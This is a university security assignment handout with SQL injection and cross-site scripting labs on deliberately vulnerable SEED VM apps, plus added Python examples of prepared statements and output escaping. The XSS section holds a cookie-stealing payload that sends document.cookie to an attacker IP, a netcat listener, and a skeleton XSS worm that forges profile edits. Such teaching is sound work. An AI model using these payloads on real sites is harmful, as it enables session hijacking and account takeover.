Software Security Assignment II

FIT 3173 Software Security Assignment II (S1 2020)
Total Marks 100
1 Overview
The learning objective of this assignment is for you to gain first-hand experience of SQL injection attacks
and cross-site scripting attacks, and a deeper understanding of how such vulnerabilities are exploited in real-world
web applications. All tasks in this assignment can be done on the "SeedVM" used in the labs.
2 Submission Policy
You need to submit a lab report describing what you have done and what you have observed, with screenshots
wherever necessary; you also need to provide explanations or code for observations that are interesting
or surprising. In your report, you need to answer all the questions listed in this manual. Please answer
each question using at most 100 words. Typeset your report in .pdf format (make sure it can be opened
with Adobe Reader) and name it in the format [Your Name]-[Student ID]-FIT3173-Assignment2, e.g.,
HarryPotter-12345678-FIT3173-Assignment2.pdf.
All source code, where required, should be embedded in your report. In addition, if a demonstration video is
required, you should record your screen with a voice explanation and upload the video
to your Monash Google Drive. The shared URL of the video should be given in your report wherever
required. You can use this free tool to make the video:
are also fine. Then, please upload the PDF file to Moodle. Note: the assignment is due on
.
Late submission penalty: 10 points deduction per day. If you require special consideration, the
application should be submitted to the central university. Zero tolerance on plagiarism: if you are
found cheating, penalties will be applied, i.e., a zero grade for the unit. University policies can be found at
.
3 SQL Injection Attack – Using SQLi Lab [50 Marks]
SQL injection is a code injection technique that exploits vulnerabilities in the interface between web applications
and database servers. The vulnerability is present when user input is not correctly checked by the
web application before it is sent to the back-end database server.
Many web applications take input from users and then use it to construct SQL queries, so that
the web application can pull information out of the database. Web applications also use SQL queries
to store information in the database. These are common practices in the development of web applications.
When the SQL queries are not carefully constructed, SQL injection vulnerabilities can occur. SQL injection
attacks are among the most frequent attacks on web applications.
In this part, we have modified a web application called SQLi Lab, which is designed to be vulnerable to
SQL injection attacks. Although the vulnerabilities are artificially created, they capture common
mistakes made by many web developers. Your goal in this part is to find ways to exploit the SQL injection
vulnerabilities, demonstrate the damage that the attacks can achieve, and master the techniques that
can mitigate such attacks.
The database of SQLi Lab, named Users, can be inspected and manipulated after logging in to the MySQL
console with the following commands:
mysql -u root -pseedubuntu
show databases;
use Users;
describe credential;
3.1 Task 1: SQL Injection Attack on SELECT Statements [5 Marks]
In this task, your goal is to log into SQLi Lab at www.seedlabsqlinjection.com without
providing a password. You can achieve this by using SQL injection. Normally, before users start using SQLi
Lab, they need to log in using their user names and passwords. SQLi Lab displays a login window to users
and asks them to enter a username and password. The login window is shown in the following:
The authentication function is implemented by unsafe_home.php in the SQLi Lab root directory
(i.e., /var/www/SQLInjection/). It uses the user-provided data to find out whether they match
the Username and Password fields of any record in the database. If there is a match, the user
has provided a correct username and password combination and should be allowed to log in. Like most web
applications, PHP programs interact with their back-end databases using the standard SQL language. In
SQLi Lab, the following SQL query is constructed in unsafe_home.php to authenticate users:
// create a connection
$conn = getDB();
// SQL query to authenticate the user; the user-controlled values are
// spliced directly into the query string (this is the vulnerability)
$sql = "SELECT id, name, eid, salary, birth, ssn,
phoneNumber, address, email, nickname, Password
FROM credential
WHERE name='$input_uname' and Password='$hashed_pwd'";
// run the query
$result = $conn->query($sql);
if ($result && $result->num_rows == 1) {
    // found one record: allow the user to login
}
In the above SQL statement, the variable $input_uname holds the string typed in the Username textbox,
and $hashed_pwd holds the string typed in the Password textbox. The user's inputs in these two textboxes
are placed directly in the SQL query string.
Q1: There is a SQL injection vulnerability in the above query. Can you log into another person's
account without knowing the correct password? Explain your solution. Hint: you are not required to
change the code. [Marking scheme: In your report, 2.5 marks for the screenshot and 2.5 marks for the
explanation and solution]
3.2 Task 2: SQL Injection on UPDATE Statements [10 Marks]
In this task, you need to make an unauthorised modification to the database. Your goal is to modify another
user's profile using SQL injection. In SQLi Lab, if users want to update their profiles, they can click
the Edit Profile link on the navigation bar and then fill out a form to update the profile information.
After the user sends the update request to the server, an UPDATE SQL statement is constructed in
unsafe_edit_backend.php. The objective of this statement is to modify the current user's profile
information in the credential table. There is a SQL injection vulnerability in this SQL statement.
Please find the vulnerability, and then use it to do the following task:
Q2: Please point out the potential vulnerability, and explain how to achieve a SQL Injection attack
by utilizing it. [Marking scheme: In your report, 2.5 marks for the screenshot and 2.5 marks for the
explanation]
Q3: Change another user's profile without knowing his/her password. For example, if you are
logged in as Alice, your goal is to use the vulnerability to modify Ted's profile information (at least
three items), including Ted's password. After the attack, you should be able to log into Ted's account.
Explain your solution, and provide screenshots to support your ideas. Hint: the passwords stored
in the database are hashed (SHA1). If you incorrectly modify the user name or password, you can recover by
directly accessing MySQL. [Marking scheme: 2.5 marks for the screenshot and 2.5 marks for the
explanation and solutions]
3.3 Task 3: Countermeasure for UPDATE Statements [10 Marks]
Setup Remark: You need to set read/write permission for the seed user on the current website directory
before doing this task by running the commands below in your terminal. Note that the . is important: it
indicates the path to the current directory.
$ cd /var/www/SQLInjection/
$ sudo chmod -R 777 .
In this task, you need to use prepared statements as a countermeasure against SQL injection
attacks. Here is an example of how to write a prepared statement based on the SELECT statement in Task 1.
$sql = "SELECT id, name, eid, salary, birth, ssn,
phoneNumber, address, email, nickname, Password
FROM credential
WHERE name='$input_uname' and Password='$hashed_pwd'";
The above code, which is vulnerable to SQL injection attacks, can be rewritten using a prepared statement:
$stmt = $conn->prepare("SELECT id, name, eid, salary, birth, ssn,
phoneNumber, address, email, nickname, Password
FROM credential
WHERE name= ? and Password= ?");
$stmt->bind_param("ss", $input_uname, $hashed_pwd);
$stmt->execute();
$stmt->bind_result($id, $name, $eid, $salary, $birth, $ssn,
$phoneNumber, $address, $email, $nickname, $pwd);
$stmt->fetch();
$stmt->close();
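As an added example (not the lab's PHP code), the following Python port over an in-memory SQLite table contrasts the string-spliced login query of Task 1 with a parameterised SELECT and a parameterised UPDATE of the kind Task 3 asks for. The table layout, sample users and passwords are constructed for this illustration; the lab's real credential table has more columns and lives in MySQL.

```python
import hashlib
import sqlite3

# Constructed stand-in for the lab's Users.credential table; only the
# columns needed for the demonstration are kept.
SAMPLE_USERS = [("Alice", "seedalice"), ("Ted", "seedted"), ("O'Brien", "pa55word")]


def sha1_hex(password):
    # The lab stores SHA1 hex digests of passwords (see the Task 2 hint).
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE credential (id INTEGER PRIMARY KEY, name TEXT, "
                 "Password TEXT, nickname TEXT)")
    conn.executemany("INSERT INTO credential (name, Password) VALUES (?, ?)",
                     [(name, sha1_hex(pwd)) for name, pwd in SAMPLE_USERS])
    return conn


def login_concat(conn, input_uname, input_pwd):
    """Mirrors the unsafe_home.php pattern: user input is spliced into SQL text."""
    hashed_pwd = sha1_hex(input_pwd)
    sql = ("SELECT id, name FROM credential "
           f"WHERE name='{input_uname}' and Password='{hashed_pwd}'")
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        # A perfectly legitimate apostrophe already changes the query's
        # structure; that is the same weakness an attacker relies on.
        return ("error", str(exc))


def login_prepared(conn, input_uname, input_pwd):
    """Prepared statement: placeholders are bound as data, never parsed as SQL."""
    hashed_pwd = sha1_hex(input_pwd)
    sql = "SELECT id, name FROM credential WHERE name=? and Password=?"
    return conn.execute(sql, (input_uname, hashed_pwd)).fetchone()


def update_profile_prepared(conn, user_id, nickname, new_password=None):
    """Parameterised UPDATE for an Edit Profile flow. The row is selected by the
    session's user id, not by anything the form submits, and every value is bound."""
    if new_password is None:
        conn.execute("UPDATE credential SET nickname=? WHERE id=?", (nickname, user_id))
    else:
        conn.execute("UPDATE credential SET nickname=?, Password=? WHERE id=?",
                     (nickname, sha1_hex(new_password), user_id))
    conn.commit()
    return conn.execute("SELECT nickname FROM credential WHERE id=?", (user_id,)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, "O'Brien", "pa55word"))    # ('error', ...): the quote broke the SQL
    print(login_prepared(db, "O'Brien", "pa55word"))  # (3, "O'Brien")
    print(update_profile_prepared(db, 1, "Ali's nick"))  # "Ali's nick", stored verbatim as data
```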
Q4: Follow the above steps to fix the SQL injection vulnerability of the UPDATE statement on the
Edit Profile page. Then, check whether you can still exploit the vulnerability or not. Provide your
code, and briefly explain your solution with screenshots. Hint: the UPDATE statement is located in
unsafe_edit_backend.php. [Marking scheme: In your report, 5 marks for the screenshot and 5
marks for the explanation and solutions]
3.4 Task 4: Second-order Attacks [25 Marks]
In this task, you need to perform second-order attacks to achieve different adversarial goals. Unlike direct
injection flaws, where the injected query executes immediately, second-order attacks delay the execution until a
later time. A malicious user first gets a query fragment stored through one query, where the application later
treats it as a trusted source. The stored fragment is then executed by a secondary query that is vulnerable to SQL injection.
We have extended SQLi Lab to help you explore second-order attacks and complete this task.
You need to download the PHP source files unsafe_home.php, unsafe_edit_frontend.php,
unsafe_task_load.php, unsafe_view_order.php, and unsafe_tasks_view.php from Moodle
and place them in the website's directory. For instance, you can use the command below to copy
the file unsafe_home.php located in /home/seed/Documents to the website's directory.
$ su root
Password: (enter root password “seedubuntu”)
# cp /home/seed/Documents/unsafe_home.php /var/www/SQLInjection/
We have also upgraded the database of SQLi Lab to enrich the website's features. That is, a user can
add tasks, set a task sort preference, and view all his/her declared tasks. Note that you need to download a
database script file, script.sql, from Moodle and execute it in the MySQL console before you can use
these new features. For instance, you can use the commands below to execute that script when it is stored
in /home/seed/Documents. The execution will update your database schema and insert new data as
follows:
mysql -u root -pseedubuntu
show databases;
use Users;
source /home/seed/Documents/script.sql
• Table tasks(TaskID,Name,Hours,Amount,Description,Owner,Type) stores the tasks
of users, in which tasks(Owner) is a foreign key referring to credential(ID). Hence, only
existing users in the table credential can create new tasks.
You can use the command describe tasks; to learn more about this table schema.
• Table preference(PreferenceID,favourite,Owner) records the task sort preference of
users, in which preference(Owner) is a foreign key referring to credential(ID). Existing
users can select one of the task fields as their sorting favourite. For instance, the following figure
demonstrates how Alice can set her preference to Hours increasing. You can use the command
describe preference; to learn more about this table schema.
• Function userIdMaxTasks() returns the ID of the user who has the maximum number of tasks in
your database. In the MySQL console, you can use the command select userIdMaxTasks(); to
retrieve that result.
• Function generateRandomUser() adds a new random user (with a random Name and Password)
to the table credential. In the MySQL console, you can use the command select generateRandomUser();
to perform this addition.
• Function getNewestUserId() returns the ID of the most recently created user in the table credential.
• Stored procedure copyTasksToUser(in userID int(6) UNSIGNED) copies all tasks of
other users to the user having that userID. You need to make sure the user with that userID exists
in the table credential before using this stored procedure. For instance, in the MySQL console,
you can use the command call copyTasksToUser(6); to copy all tasks of other users to an
existing user with userID=6.
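A defensive example, added here and not part of the lab's code: a value read back from preference.favourite was once user input, so a task-listing query must validate it before it reaches ORDER BY (identifiers cannot be bound as placeholders, so an allowlist is the only safe option). The schema is a cut-down SQLite sketch of the tasks and preference tables described above, and the "column direction" storage format of favourite is an assumption of this example.

```python
import sqlite3

# Allowlists: the only identifiers ever allowed to reach the ORDER BY clause.
TASK_COLUMNS = ("TaskID", "Name", "Hours", "Amount", "Description", "Type")
DIRECTIONS = ("ASC", "DESC")
DEFAULT_SORT = ("TaskID", "ASC")


def make_db():
    """Constructed sketch of the tasks/preference tables, with sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE credential (ID INTEGER PRIMARY KEY, Name TEXT);
        CREATE TABLE tasks (TaskID INTEGER PRIMARY KEY, Name TEXT, Hours INTEGER,
                            Amount INTEGER, Description TEXT, Owner INTEGER, Type TEXT);
        CREATE TABLE preference (PreferenceID INTEGER PRIMARY KEY, favourite TEXT,
                                 Owner INTEGER);
        INSERT INTO credential VALUES (1, 'Alice'), (2, 'Ted');
        INSERT INTO tasks (Name, Hours, Amount, Description, Owner, Type) VALUES
            ('Write report', 3, 100, 'Q1 draft', 1, 'doc'),
            ('Fix build', 1, 50, 'CI is red', 1, 'dev'),
            ('Peer review', 2, 80, 'Review PR', 2, 'doc');
        -- Alice's preference is well-formed; Ted's names a column that does not exist.
        INSERT INTO preference (favourite, Owner) VALUES ('Hours asc', 1), ('Colour desc', 2);
    """)
    return conn


def parse_sort_preference(favourite):
    """Validate a stored 'column direction' preference against the allowlists.
    Anything read back from the database is still untrusted input."""
    parts = favourite.split()
    if len(parts) != 2:
        raise ValueError(f"malformed preference: {favourite!r}")
    column, direction = parts[0], parts[1].upper()
    if column not in TASK_COLUMNS or direction not in DIRECTIONS:
        raise ValueError(f"preference not in allowlist: {favourite!r}")
    return column, direction


def view_tasks(conn, owner_id):
    """List a user's tasks, ordered by their stored preference if it is valid."""
    row = conn.execute("SELECT favourite FROM preference WHERE Owner=?",
                       (owner_id,)).fetchone()
    column, direction = DEFAULT_SORT
    if row is not None:
        try:
            column, direction = parse_sort_preference(row[0])
        except ValueError:
            pass  # fall back to the default rather than trust the stored text
    # Only allowlisted identifiers are interpolated; the owner is bound as data.
    sql = f"SELECT Name, Hours, Amount FROM tasks WHERE Owner=? ORDER BY {column} {direction}"
    return conn.execute(sql, (owner_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(view_tasks(db, 1))  # sorted by Hours ascending
    print(view_tasks(db, 2))  # invalid preference ignored, default order used
```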
Q5: In a normal scenario, a user can add a new task multiple times and update his/her view
preference, sorting by asc or desc. However, the website is vulnerable to second-order
attacks when the user views all tasks. You can choose one of the following options to complete this
task. Note that you will get 0 marks if you complete the task without performing a second-order attack
(i.e., by manipulating the database manually in the MySQL console).
Option 1 (5 marks): You need to perform the attack so that the tasks of the user who has the
maximum number of tasks are displayed when you view your tasks. [Marking scheme: In your recording, 5 marks
are only given if you have a solid demonstration and explanation of how you inject queries and how the
attack works in your case.] You also need to provide the necessary screenshots in your report. Then, you
need to upload your demo video to your Monash Google Drive and embed its shared link in your report so
that the teaching team can view and verify your work.
If you achieve the adversarial goal successfully, you will obtain a result like the following figure. Note
that the second table in the figure displays the tasks of that victim.
Option 2 (15 marks): You need to perform a sequence of second-order attacks in order to transfer
all the tasks of users to a new malicious user that you created. Note that creating that malicious user also has
to be done using a second-order attack. [Marking scheme: In your recording, 15 marks are only given
if you have a solid demonstration and explanation of how you inject queries and how the attack works
in your case to achieve that adversarial goal.] You also need to provide the necessary screenshots in your
report. Then, you need to upload your demo video to your Monash Google Drive and embed its shared link
in your report so that the teaching team can view and verify your work.
If you achieve the adversarial goal successfully, you will obtain a result like the following figure. Note
that the second table in the figure displays the malicious user who has the maximum number of tasks. The
first table is blank because no task remains for the user Ted.
Q6 (5 marks): This open-ended question is independent of your selected option in Q5. In this
question, you need to perform a second-order attack on SQLi Lab that attacks the performance of
your MySQL server. [Marking scheme: In your recording, 5 marks are only given if you have a solid
demonstration and explanation of how you inject queries and how the attack works in your case.] You
also need to provide the necessary screenshots in your report. Then, you need to upload your demo video to
your Monash Google Drive and embed its shared link in your report so that the teaching team can view and
verify your work. Hint: you can delay the query execution or shut down your MySQL server when a user
views his/her declared tasks.
Q7 (5 marks): Provide your theoretical mitigation against the second-order attacks in
your selected option of Q5. You do not need to change the PHP source files for this question. [Marking
scheme: 5 marks are only given if you have a solid explanation in your report.]
4 Cross-Site Scripting (XSS) Attack – Using Elgg [50 Marks]
Cross-site scripting (XSS) is a type of vulnerability commonly found in web applications. This vulnerability
makes it possible for attackers to inject malicious code (e.g., JavaScript programs) into a victim's web browser.
Using this malicious code, attackers can steal a victim's credentials, such as session cookies. The access
control policies (i.e., the same-origin policy) employed by browsers to protect those credentials can be
bypassed by exploiting the XSS vulnerability. Vulnerabilities of this kind can potentially lead to large-scale
attacks.
To demonstrate what attackers can do by exploiting XSS vulnerabilities, we have set up a web application
named Elgg in our pre-built Ubuntu VM image. Elgg is a very popular open-source web application
for social networking, and it has implemented a number of countermeasures to remedy the XSS threat. To
demonstrate how XSS attacks work, we have commented out these countermeasures in our Elgg installation,
intentionally making it vulnerable to XSS attacks. Without the countermeasures, users can post
arbitrary messages, including JavaScript programs, to user profiles. You need to exploit this vulnerability
by posting malicious messages to their profiles; users who view these profiles will become
victims.
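An added illustration, not Elgg's code, of the kind of countermeasure this lab disables: output-encode profile text before it is placed in the page, and audit stored fields for script that has already been saved. The sample profile texts are constructed here, two of them reusing this assignment's own XSS snippets; the wrapper markup and the audit pattern are assumptions of the example.

```python
import html
import re

# Constructed profile submissions: one benign rich-text entry and two taken
# from this assignment's own XSS examples.
SAMPLE_PROFILES = {
    "alice": "Hi, I like <b>bold</b> text & coffee",
    "samy": "<script>alert('How are you?');</script>",
    "boby": '<script type="text/javascript" src="http://www.example.com/myscripts.js"></script>',
}

# Markers of active content in a stored field: a script tag, an inline event
# handler attribute, or a javascript: URL.
ACTIVE_CONTENT = re.compile(r"<\s*script\b|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)

WRAPPER_OPEN = '<div class="brief">'
WRAPPER_CLOSE = "</div>"


def render_brief_description(text):
    """Output-encode user text for an HTML element context.
    Every < > & " ' is replaced by an entity, so a stored <script> is shown as
    literal text instead of being parsed as markup. A field that should keep
    some tags needs an allowlist-based HTML sanitizer instead; escaping is the
    right default for a plain text field."""
    return WRAPPER_OPEN + html.escape(text, quote=True) + WRAPPER_CLOSE


def is_inert(rendered_html):
    """True if the rendered fragment contains no tag other than our own wrapper."""
    inner = rendered_html[len(WRAPPER_OPEN):-len(WRAPPER_CLOSE)]
    return "<" not in inner and ">" not in inner


def find_stored_scripts(profiles):
    """Audit helper for defenders: which stored profile fields carry active content."""
    return sorted(user for user, text in profiles.items() if ACTIVE_CONTENT.search(text))


if __name__ == "__main__":
    for user, text in SAMPLE_PROFILES.items():
        print(user, render_brief_description(text))
    print("needs cleanup:", find_stored_scripts(SAMPLE_PROFILES))  # ['boby', 'samy']
```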
4.1 Environment Configuration
This lab can only be conducted in the "SeedVM" we provided, because of the configuration we have
performed to support this lab. In this part, we need three things, all of which are already installed in
the provided VM image: (1) the Firefox web browser, (2) the Apache web server, and (3) the Elgg web
application.
For the browser, we need to use the HTTP Header Live extension for Firefox to inspect the HTTP requests
and responses. From the Firefox web browser in the VM, you can download and install this extension.
Elgg Web Application. We use an open-source web application called Elgg in this lab. Elgg is a web-based
social-networking application. It is already set up in the pre-built Ubuntu VM image. We have also
created several user accounts on the Elgg server; the credentials are given in Table 1.
DNS Configuration. We have configured the following URL needed for this lab. The folder where the
web application is installed and the URL to access this web application are described in the following:
URL: http://www.xsslabelgg.com/
Folder: /var/www/XSS/Elgg
Table 1: User credentials
User      UserName   Password
Admin     admin      seedelgg
Alice     alice      seedalice
Boby      boby       seedboby
Charlie   charlie    seedcharlie
Samy      samy       seedsamy
The above URL is only accessible from inside the virtual machine, because we have modified the
/etc/hosts file to map the domain name of each URL to the virtual machine's local IP address (127.0.0.1).
You may map any domain name to a particular IP address using /etc/hosts. For example, you can map
http://www.example.com to the local IP address by appending the following entry to /etc/hosts:
127.0.0.1 www.example.com
If your web server and browser are running on two different machines, you need to modify /etc/hosts
on the browser’s machine accordingly to map these domain names to the web server’s IP address, not to
127.0.0.1.
Apache configuration. In our pre-built VM image, we use the Apache server to host all the web sites used in
the lab. Apache's name-based virtual hosting feature can be used to host several web sites (or URLs)
on the same machine. A configuration file named 000-default.conf in the directory /etc/apache2/sites-available
contains the necessary directives for the configuration:
Inside the configuration file, each web site has a VirtualHost block that specifies the URL for the web
site and the directory in the file system that contains the sources for the web site. The following examples
show how to configure a website with URL http://www.example1.com and another website with URL
http://www.example2.com:
<VirtualHost *>
ServerName http://www.example1.com
DocumentRoot /var/www/Example1
</VirtualHost>
<VirtualHost *>
ServerName http://www.example2.com
DocumentRoot /var/www/Example2
</VirtualHost>
You may modify the web application by accessing the source in the mentioned directories. For example,
with the above configuration, the web application http://www.example1.com can be changed by modifying
the sources in the /var/www/Example1/ directory. After a change is made to the configuration, the Apache
server needs to be restarted with the following command:
$ sudo service apache2 restart
4.2 Task 1: Posting a Malicious Message to Display an Alert Window [10 Marks]
The objective of this task is to embed a JavaScript program in your Elgg profile, such that when another
user views your profile, the JavaScript program will be executed and an alert window will be displayed. The
following JavaScript program will display an alert window:
<script>alert('How are you?');</script>
If you embed the above JavaScript code in your profile (e.g., in the brief description field), then any user
who views your profile will see the alert window.
In this case, the JavaScript code is short enough to be typed into the brief description field. If you want
to run a long JavaScript program but are limited by the number of characters you can type in the form, you can
store the JavaScript program in a standalone file with the .js extension and then refer to it using the
src attribute of the <script> tag. See the following example:
<script type="text/javascript"
src="http://www.example.com/myscripts.js">
</script>
In the above example, the page will fetch the JavaScript program from http://www.example.com,
which can be any web server.
Q1: Try to fetch the JavaScript from a server. Describe your observation, and provide a screenshot
showing the alert. Hint: You need to set up a server (e.g., www.example.com) and put the above
JavaScript there. You can modify one user's profile (e.g., alice) and view his/her profile as admin. [Marking
scheme: In your report, 5 marks for the screenshot. In your recording, 5 marks for the demonstration,
explanation and solutions.]
4.3 Task 2: Stealing Cookies from the Victim’s Machine [20 Marks]
The objective of this task is to steal the cookies from the victim’s machine. First, we can embed a JavaScript
program in your Elgg profile, such that when another user views your profile, the user’s cookies will be
displayed in the alert window. This can be done by adding some additional code to the JavaScript program
in the previous task:
<script>alert(document.cookie);</script>
The malicious JavaScript code written by the attacker can print out the user’s cookies, but only the user
can see the cookies, not the attacker. In this task, the attacker wants the JavaScript code to send the cookies
to himself/herself. To achieve this, the malicious JavaScript code needs to send an HTTP request to the
attacker, with the cookies appended to the request.
We can do this by having the malicious JavaScript insert an <img> tag with its src attribute set to the
attacker's machine. When the JavaScript inserts the <img> tag, the browser tries to load the image from
the URL in the src field; this results in an HTTP GET request sent to the attacker's machine. The JavaScript
given below sends the cookies to port 5555 of the attacker's machine (with IP address 10.1.2.5),
where the attacker has a TCP server listening on the same port.
<script>document.write('<img src=http://attacker_IP_address:5555?c='
+ escape(document.cookie) + ' >');
</script>
A program commonly used by attackers is netcat (or nc), which, when run with the "-l" option,
becomes a TCP server that listens for a connection on the specified port. This server program basically
prints out whatever is sent by the client and sends to the client whatever is typed by the user running the
server. Type the command below to listen on port 5555:
$ nc -l 5555 -v
The "-l" option specifies that nc should listen for an incoming connection rather than initiate
a connection to a remote host. The "-v" option makes nc give more verbose output. The task can
also be done with only one VM instead of two. For one VM, replace the attacker's IP address in
the above script with 127.0.0.1. Start a new terminal and then type the nc command above.
Q2: Accomplish the above attack, and use the TCP server program to receive the fetched cookie.
Provide your screenshots in your report and your video demonstration as evidence to support and verify
that you have performed the attack and it worked successfully. You need to upload your demo video
to your Monash Google Drive and embed its shared link in your report so that the teaching team can view
and verify your work. Hint: the IP address of your local host can be set to 127.0.0.1. [Marking scheme:
10 marks for the screenshots in the report, and 10 marks for the demonstration, explanation and
solutions in the recording]
4.4 Task 3: Modifying the Victim’s Profile [20 Marks]
The objective of this task is to modify the victim's profile when the victim visits Samy's page. We will write
an XSS worm to complete the task.
We need to write a malicious JavaScript program that forges HTTP requests directly from the victim's
browser, without the intervention of the attacker. To modify a profile, we should first find out how a legitimate
user edits or modifies his/her profile in Elgg. More specifically, we need to figure out how the HTTP POST
request that modifies a user's profile is constructed. We will use Firefox's HTTP inspection tool. Once we
understand what the modify-profile HTTP POST request looks like, we can write a JavaScript program to
send out the same HTTP request. We provide a skeleton JavaScript code that aids in completing the task.
<script type="text/javascript">
window.onload = function(){
//JavaScript code to access user name, user guid, Time Stamp __elgg_ts
//and Security Token __elgg_token
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
var name="&name="+userName;
//Construct the content of your url.
var sendurl=…; //FILL IN
var desc=…; //FILL IN
var content=…; //FILL IN
var samyGuid=…; //FILL IN
if(elgg.session.user.guid!=samyGuid){
//Create and send Ajax request to modify profile
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
The above code should be placed in the "About Me" field of Samy's profile page. This field provides
two editing modes: Editor mode (default) and Text mode. The Editor mode adds extra HTML code to the
text typed into the field, while the Text mode does not. Since we do not want any extra code added to our
attacking code, the Text mode should be enabled before entering the above JavaScript code. This can be
done by clicking on "Edit HTML", which can be found at the top right of the "About Me" text field.
Q3: Accomplish the above attack, and provide your screenshots in your report and your video
demonstration as evidence to support and verify that you have performed the attack and it worked
successfully. You need to upload your demo video to your Monash Google Drive and embed its shared link
in your report so that the teaching team can view and verify your work. Hint: You may use the HTTP inspection
tool to see what the HTTP request looks like. [Marking scheme: 10 marks for the screenshots in the report,
and 10 marks for the demonstration, explanation and solutions in the recording]